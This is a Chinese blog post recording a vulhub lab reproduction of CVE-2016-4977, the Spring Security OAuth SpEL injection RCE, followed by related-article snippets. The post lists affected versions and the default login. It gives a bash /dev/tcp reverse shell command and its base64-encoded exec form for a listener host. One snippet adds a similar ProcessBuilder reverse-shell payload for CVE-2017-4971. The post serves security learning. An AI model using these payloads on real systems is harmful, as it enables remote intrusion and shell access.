vulhub-CVE-2016-4977-SpringSecurityOauth RCE复现记录

最新推荐文章于 2023-12-04 16:22:18 发布
最新推荐文章于 2023-12-04 16:22:18 发布
阅读量239 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42513429/article/details/119807763
版权

https://www.cnblogs.com/litlife/p/10380701.html
https://blog.csdn.net/qq_45300786/article/details/119249422

参考别人的博客,对CVE-2016-4977进行复现
Spring Security OAuth SpEL表达式注入
影响范围(复制来的):

Spring Security OAuth 1.0.0到1.0.5
Spring Security OAuth 2.0.0到2.0.9
Spring Security OAuth 2.0到2.0.14
Spring Security OAuth 2.1到2.1.1
Spring Security OAuth 2.2到2.2.1
Spring Security OAuth 2.3到2.3.2

运行docker

docker-compose up -d

服务器访问地址:

http://192.168.159.144:8080/oauth/authorize

在这里插入图片描述

admin/admin

在这里插入图片描述
反弹shell(其他利用方式看引用的博客,这里仅复现反弹shell)
payload

bash -i >& /dev/tcp/192.168.159.144/6666 0>&1

base64编码

http://www.jackson-t.ca/runtime-exec-payloads.html

得到

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1OS4xNDQvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}

使用poc.py生成payload
在这里插入图片描述

设置监听
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

sillyboy_lch
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python - scapy - dns sniffer / posioning
Nixawk
05-23 5170
How to parse dns request and response ? Scapy is a powerful tool, and it can help us for dns detail.#!/usr/bin/env python # -*- coding: utf8 -*-""" execte demo py with root privilege, and finish double
cve-2016-4977(spring-security-oauth) RCE漏洞
m0_58596609的博客
04-21 4921
cve-2016-4977(spring-security-oauth) RCE漏洞
CVE-2016-4977(Spring-Security-Oauth)RCE远程命令执行漏洞(超详细版!)
精品博客,你值得一看~
09-02 881
它是为了解决企业应用开发的杂性而创建的。Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞。#按 " i "进行编辑 ,然后制下面的脚本 , 再按 " Esc "键 ,再按冒号wq " :wq " 保存并退出.先cd到spring目录下的CVE-2016-4977里面,然后使用docker-compose启动环境.
spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)-kali
qq_41760817的博客
12-04 1170
spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)
Spring Security OAuth2 远程代码执行漏洞分析(CVE-2016-4977/CVE-2018-1260)
mole_exp的博客
02-22 5351
Spring Security OAuth2 远程代码执行漏洞分析(CVE-2016-4977/CVE-2018-1260)
vulhub漏洞 CVE-2016-3088
最新发布
03-14
vulhub漏洞 CVE-2016-3088
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
CVE-2021-3129-EXP 自动写shell的exp
CVE-2021-34473 Exchange RCE.MD
04-23
CVE-2021-34473 Exchange RCE
【vulhub】 Spring boot Security OAuth RCE (CVE-2016-4977) 漏洞验证与getshell
qq_45300786的博客
07-30 2081
利用条件 0x01 影响版本 Spring Security OAuth 1.0.0到1.0.5 Spring Security OAuth 2.0.0到2.0.9 Spring Security OAuth 2.0到2.0.14 Spring Security OAuth 2.1到2.1.1 Spring Security OAuth 2.2到2.2.1 Spring Security OAuth 2.3到2.3.2 0x02 默认登录账号密码 admin\admin 访问路径/oauth/auth
CVE-2016-4977 Spring远程代码执行漏洞 POC、EXP在文末
weixin_45715461的博客
08-10 1427
CVE-2016-4977 Spring远程代码执行漏洞 POC、EXP在文末
Spring漏洞(CVE-2016-4977)在IDEA中
wxzyyds的博客
11-03 1244
Spring(CVE-2016-4977),并且在IDEA中实动态调试
漏洞—Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1055
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
CVE-2019-17564漏洞[基于Ubuntu 16.04 LTS]
rep_Su的博客
02-15 4859
基于Ubuntu 16.04 LTS的CVE-2019-17563漏洞0x0 漏洞描述0x1 影响范围0x2 漏洞环境准备环境搭建漏洞展示0x3 其他修建议关于此文参考链接 0x0 漏洞描述 Apache Dubbo支持多种协议,官方推荐使用 Dubbo 协议,CVE-2019-17564是属于Apache Dubbo HTTP协议中的一个反序列化漏洞,该漏洞的主要原因在于当Apache...
CVE-2016-4977——Spring Security OAuth2 远程命令执行漏洞
记录并分享学习安全的知识点..
01-15 875
一、漏洞概述 Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 二、漏洞页面如下: poc如下: http://your-ip:8080/oauth/authorize?response_type=[POC]&client_id=acme
Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)
EC_Carrot的博客
08-02 660
漏洞简介 Pivotal Spring Security OAuth 2.0.0版本至2.0.9版本和1.0.0版本至1.0.5版本中存在安全漏洞。远程攻击者可通过为‘response_type’参数制作值利用该漏洞执行代码。 漏洞 我们来进行反弹shell的操作,首先将bash命令进行编码: bash -i >& /dev/tcp/your-ip/9999 0>&1 我这里使用的是vulhub的环境,环境内有一个poc.py,用python3运行该脚本后,会让你输入字符
【spring漏洞】CVE-2016-4977+CVE-2017-8046+CVE-2017-4971+CVE-2018-1270+CVE-2018-1273远程命令执行漏洞
serendipity1130的博客
09-01 574
1.CVE-2016-4977 Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language(SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 1.访问网址: http://192.168.225.139:8080/oauth/authorize?response_type=${233*233}&client
vulhubCVE-2022-22947
10-13
CVE-2022-22947漏洞,需要先在vulhub上搭建一个运行着vBulletin 5.6.4版本的环境。然后,通过发送特制的HTTP请求,即可触发漏洞,导致远程代码执行。 具体步骤如下: 1. 在vulhub上下载并启动vBulletin ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值